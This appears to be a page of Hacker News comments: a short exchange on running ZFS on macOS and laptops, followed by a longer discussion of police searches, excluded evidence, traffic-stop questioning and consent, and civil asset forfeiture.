I haven't. ZFS might be the answer for my laptops.


It's worth a spin. Before moving to iSCSI I had my home folder as well as lots of projects and data on ZFS for macOS for almost a decade, and it was extremely reliable and performant within reason [0]. ZoL of course is also quite solid at this point too. Life gets a lot more complex if you want to boot off of it, but a shared data partition for two separate OS boots could be a good match.

----

0: By which I mean, for equivalent features. It's possible to go really far out of the normal with ZFS in terms of silly compression and multiple copies of data even within a single OS and checksumming and so on in ways that add computational overhead, but I don't hold that against it vs APFS.


>There are many instances today of cops forcibly entering a home claiming nothing more than a welfare check, or "we received a call."

Sure, but there are also many instances today of evidence getting thrown out in court due to cops not getting a warranty and poisoning the tree and all its fruit. Rights don't just enforce themselves, there are and have to be a number of layers to the onion to help reduce the violation numbers at each stage.


There's also plenty of examples of even if the evidence is thrown out, there's damage to life or property that is never made whole.


I'm personally less concerned with those cases and more concerned with evidence that ultimately is thrown out allowed them to build a case that otherwise would have gone nowhere.

Say they search a vehicle without consent or probable cause and find weed. Then they further investigate the person and find additional evidence they otherwise never would have found. That weed find may get thrown out but it doesn't always nullify the rest of the case, and if the DA is clever they simply wouldn't submit the weed as evidence at all.


Maybe a better example as a half decent defense attorney, or the judge, could get subsequent evidence thrown out there.

A cop pulls you over for a brake light. They decide to go fishing, asking where you're coming from or where you're going, looking for any inconsistency to pull on. Maybe they decide they smell something on your breath.

A well informed person would refuse to ask questions and help ensure the traffic stop can move forward with the ticket, the cop isn't allowed to hold you for longer than required for the initial offense.

Most people when asked questions, though, will answer. Most people asked to take a field sobriety test will oblige. None of that is required and all requires consent - the cop knows that and knows that few people will stand up for that.

Such fishing expeditions should be illegal and anything found should be considered inadmissible due to unreasonable search. When the professional trained in law knows that they can game the average person it should be unreasonable practice.


They can push pretty hard. Even this law student, who knows the game, is almost worn down by these officers https://m.youtube.com/watch?v=c3t--Glqs2o&t=1163s&pp=ygUdTGF...


That's not really relevant this was about going to jail after police break the constitution. If we're talking about bad things cops do there's civil asset forfeiture.


The minute the entanglement happens the person on the receiving end’s life gets 1000x more complicated. It’s a hollow victory if you have to go to court and spend a year or more defending yourself


Rights needing to occasionally be upheld by the courts wasn't my complaint though. Its cases where rights we're clearly infringed, at least I'd expect most citizens would agree, and courts uphold it because a person didn't say a particular phrase, for example, or because a "reasonable" cop would have seen a cracked door as implied consent.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: